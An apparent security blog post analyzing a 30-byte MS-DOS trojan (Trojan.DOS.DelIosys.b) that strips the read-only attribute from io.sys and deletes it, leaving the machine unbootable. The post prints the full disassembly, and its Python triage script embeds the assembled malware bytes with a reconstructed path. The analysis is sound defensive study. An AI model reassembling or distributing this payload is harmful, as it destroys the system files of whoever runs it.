Vista IRP Struct with offset references for consult

September 10, 2009

Redirection:

http://evilcodecave.blogspot.com/2009/09/vista-irp-struct-with-offset-references.html


[Malware] Trojan.DOS.DelIosys.b

September 28, 2007

This morning, among the usual spam, I received a little attachment containing an old virus, so I dissected it:

seg000:0100 mov ax, 4301h ; AH=43h / AL=01h: set file attributes
seg000:0103 mov dx, 114h ; DS:DX -> ASCIZ filename stored right after the code (io.sys)
seg000:0106 mov cx, 6 ; new attributes: hidden (2) | system (4), read-only bit (1) cleared
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113 ; CF set = DOS error, give up
seg000:010D mov ah, 41h ; AH=41h: delete file (DX still points to the same name)
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2 ; jumps to the next instruction either way (no-op)
seg000:0113 retn ; return to DOS (terminates a COM program)
seg000:0113 start endp

The file is a tiny COM executable for MS-DOS that uses two elementary INT 21h calls: AH=43h/AL=01h to set file attributes, and AH=41h to delete a file. The ASCIZ pathname at DS:DX points to io.sys, the DOS system file. The attribute call is not decoration: CX=6 sets hidden and system but leaves the read-only bit clear, and DOS refuses to unlink a read-only file (it returns "access denied" with CF set), so stripping read-only first is what makes the following delete succeed. With io.sys gone the machine no longer boots.

The major antivirus products identify this malware as Trojan.DOS.DelIosys.b.

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835
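Since a sample this small has no packer or obfuscation, the whole analysis is a matter of decoding the handful of opcodes and resolving what DS:DX points at. The script below is an added example (not the blog's code and not the malware itself): it assembles the 20 code bytes from the listing above, appends a constructed path string (the exact string "C:\IO.SYS" is an assumption consistent with the description and the 30-byte file size), then linearly sweeps the 8086 opcode subset such droppers use while tracking AX/CX/DX so that each INT 21h is reported with its function and arguments. It also decodes the CX attribute bits, which is how you spot that the read-only bit is being cleared before the delete.

```python
"""Static triage of a tiny MS-DOS .COM dropper (added example).

Decodes the small 8086 opcode subset used by droppers of this size, tracks
the 16-bit registers that INT 21h consumes (AX, CX, DX) and resolves DS:DX to
the ASCIZ string inside the image. A .COM file is loaded at CS:0100h with
DS = CS, so an offset in DX maps directly onto the file bytes.
"""

COM_ORIGIN = 0x100

# 20 code bytes assembled from the disassembly on the page, followed by a
# CONSTRUCTED path string: "C:\IO.SYS" is an assumption (the page only says
# io.sys and a 30-byte file; 20 code bytes + 10 string bytes = 30).
SAMPLE_COM = bytes.fromhex(
    "b80143"    # mov ax, 4301h
    "ba1401"    # mov dx, 114h
    "b90600"    # mov cx, 6
    "cd21"      # int 21h
    "7206"      # jb short 0113h
    "b441"      # mov ah, 41h
    "cd21"      # int 21h
    "7200"      # jb short $+2
    "c3"        # retn
) + b"C:\\IO.SYS\x00"

# DOS file attribute bits as passed in CX to INT 21h AH=43h AL=01h.
ATTR_BITS = {0x01: "READ_ONLY", 0x02: "HIDDEN", 0x04: "SYSTEM",
             0x08: "VOLUME", 0x10: "DIRECTORY", 0x20: "ARCHIVE"}

REG16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]   # opcode B8+r
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]    # opcode B0+r


def set_reg8(regs, name, val):
    """Write an 8-bit register by patching the matching half of its 16-bit parent."""
    idx = REG8.index(name)
    base = REG16[idx & 3]
    if idx >= 4:   # ah/ch/dh/bh live in the high byte
        regs[base] = (regs[base] & 0x00FF) | (val << 8)
    else:
        regs[base] = (regs[base] & 0xFF00) | val


def asciz_at(image, offset):
    """Read the NUL-terminated string at CS:offset inside the .COM image."""
    start = offset - COM_ORIGIN
    if start < 0 or start >= len(image):
        raise ValueError(f"DS:DX={offset:04X} points outside the image")
    end = image.index(b"\x00", start)
    return image[start:end].decode("ascii")


def describe_int21(regs, image):
    """Turn the register state at an INT 21h into a readable call record."""
    ah, al = regs["ax"] >> 8, regs["ax"] & 0xFF
    if ah == 0x43:
        path = asciz_at(image, regs["dx"])
        if al == 0x01:
            attrs = [n for bit, n in ATTR_BITS.items() if regs["cx"] & bit]
            return ("SET_FILE_ATTRIBUTES", path, regs["cx"], attrs)
        return ("GET_FILE_ATTRIBUTES", path)
    if ah == 0x41:
        return ("DELETE_FILE", asciz_at(image, regs["dx"]))
    return (f"INT21_AH_{ah:02X}",)


def trace_dos_calls(image):
    """Linear sweep over the code, recording every INT 21h with resolved arguments.

    Only the opcodes a dropper of this size uses are decoded; an unknown opcode
    raises rather than guessing. Conditional jumps (jb) are treated as not
    taken, i.e. we follow the success path that the dropper needs.
    """
    regs = {r: 0 for r in REG16}
    calls = []
    ip = 0
    while ip < len(image):
        op = image[ip]
        if 0xB8 <= op <= 0xBF:                       # mov r16, imm16
            regs[REG16[op - 0xB8]] = int.from_bytes(image[ip + 1:ip + 3], "little")
            ip += 3
        elif 0xB0 <= op <= 0xB7:                     # mov r8, imm8
            set_reg8(regs, REG8[op - 0xB0], image[ip + 1])
            ip += 2
        elif op == 0xCD:                             # int imm8
            if image[ip + 1] == 0x21:
                calls.append(describe_int21(regs, image))
            ip += 2
        elif op == 0x72:                             # jb rel8: assume CF clear, fall through
            ip += 2
        elif op == 0xC3:                             # retn: program ends
            break
        else:
            raise ValueError(f"unsupported opcode {op:02X} at {COM_ORIGIN + ip:04X}")
    return calls


if __name__ == "__main__":
    for call in trace_dos_calls(SAMPLE_COM):
        print(call)
```

Running it prints the two calls in order, with the attribute list showing HIDDEN and SYSTEM but no READ_ONLY, which is the tell: the dropper is not hiding io.sys, it is making it deletable. Because the sweep stops on any opcode it does not know, the same script is safe to point at other tiny COM samples without silently misreading them.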

It’s incredible how old viruses are still around the web!

See you at the next post 🙂